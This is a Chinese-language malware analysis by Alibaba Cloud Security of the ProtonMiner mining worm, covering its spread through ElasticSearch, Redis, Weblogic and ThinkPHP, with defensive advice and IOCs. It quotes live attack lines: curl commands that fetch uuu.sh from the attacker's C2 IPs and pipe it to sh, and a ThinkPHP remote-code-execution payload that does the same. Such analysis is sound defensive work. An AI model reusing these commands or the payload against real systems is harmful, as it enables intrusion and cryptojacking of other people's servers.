背景
近日,阿裡雲安全監測到一種挖礦蠕蟲,正在網際網路上加速傳播。阿裡雲安全根據它使用ProtonMail郵箱位址作為礦池使用者名的行為,将其命名為ProtonMiner。據分析,這種蠕蟲與TrendMicro于2018年12月曾報導過的“利用ElasticSearch舊漏洞傳播的蠕蟲”非常相似,可能是同一團夥所為。但與先前報導不同的是,二月中旬,該挖礦蠕蟲擴大了攻擊面,從僅攻擊ElasticSearch這一種服務,變為攻擊包括Redis, Weblogic在内的多種服務,傳播速度大大加快。
本文着重描寫該挖礦僵屍網絡的傳播手法,并在文末列出了安全建議,以幫助使用者避免遭受感染,或在已被感染的情況下進行清理。
感染路徑
/bin/bash -c curl -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
/bin/bash -c curl -fsSL http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh 而uuu.sh腳本運作後,将繼續下載下傳挖礦程式和配置檔案用于挖礦,以及下載下傳蠕蟲木馬用于繼續攻擊未感染主機。
“謹慎”的入侵腳本
入侵腳本uuu.sh,首先會通過試着寫入"/etc/devtools"目錄,來判斷目前賬戶是否擁有root權限;腳本的大部分功能,隻有目前賬号具有root權限時才會運作。
#!/bin/sh
echo 1 > /etc/devtools
if [ -f "$rtdir" ]
then
echo "i am root"
echo "goto 1" >> /etc/devtools
# download & attack
fi 該腳本具有典型挖礦事件中惡意腳本的特征:檢查并殺死其他僵屍網絡的程序、将自身寫入系統crontab檔案、修改iptables設定進而允許某些端口上的通信等。然而這一腳本的作者或許更加謹慎:
1.在腳本最後,攻擊者清空了指令曆史記錄
2.在挖礦配置檔案中,攻擊者使用了多個ProtonMail郵箱位址作為連接配接到礦池的使用者名。ProtonMail是世界最大的安全郵件服務提供商,ProtonMiner也是是以而得名。這種使用郵箱位址,而非門羅币錢包位址作為礦池使用者名的做法很好地“保護”了攻擊者的隐私,也為安全工作者們判斷該僵屍網絡的規模和收益情況增加了難度。
傳播分析
ProtonMiner的橫向傳播程式名為"systemctI",是一個由Go語言編譯的程式。它的main函數如下圖所示:
該程式在運作時,會首先通過_tmp_exe_linx_ipc_Init_ip等方法對要掃描的ip和使用的弱密碼進行初始化。過程中會請求并下載下傳以下兩個位址的檔案。
https://pixeldra.in/api/download/I9RRye(ip位址c段清單)
https://pixeldra.in/api/download/-7A5aP(弱密碼清單)
之後程式會進入main_Scan函數,該函數包含大量的掃描和漏洞利用相關子函數。
下表列出了受到該挖礦僵屍網絡影響的服務和漏洞:
例如一個ThinkPHP 的payload:
POST /index.php?s=captcha HTTP/1.1%0d%0aHost: ...%0d%0aUser-Agent: Go-http-client/1.1%0d%0aContent-Length:132%0d%0aConnection: close%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0aAccept-Encoding:gzip%0d%0a%0d%0a_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=url -fsSL
http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh|sh
ProtonMiner僵屍網絡擴大攻擊面之後,傳播速度有了顯著的提升。從下圖可以看出,進入2月份以來,攻擊量快速上升,并在2月中旬達到高峰,阿裡雲觀察到已有上千台主機受到感染:
安全建議
- 不要用root賬戶啟動資料庫、網站伺服器等服務,因為root啟動的服務一旦被成功入侵,攻擊者将擁有被入侵主機的所有權限。此外,像Redis和Hadoop這些主要是内部使用的服務,不應暴露在公網上。
- 挖礦僵屍網絡更新速度非常快,它們部分導緻了網際網路上無處不在的威脅。您可以使用雲防火牆服務,檢測、攔截、并保護客戶避免感染。
- 如果你關注自身業務的網絡安全卻又雇不起一名安全工程師,那麼你可以試試阿裡雲的安全管家産品,讓阿裡雲的安全專家來給你恰當的幫助,例如協助你清除已存在的病毒、木馬等。
IOC
C&C伺服器:
45.76.122.92
207.148.70.143
惡意檔案:
礦池位址:
xmr.pool.minergate.com:45700
使用的賬号(郵箱)名:
參考
https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-spreads-via-old-vulnerabilities-on-elasticsearch/
本文作者:悟泛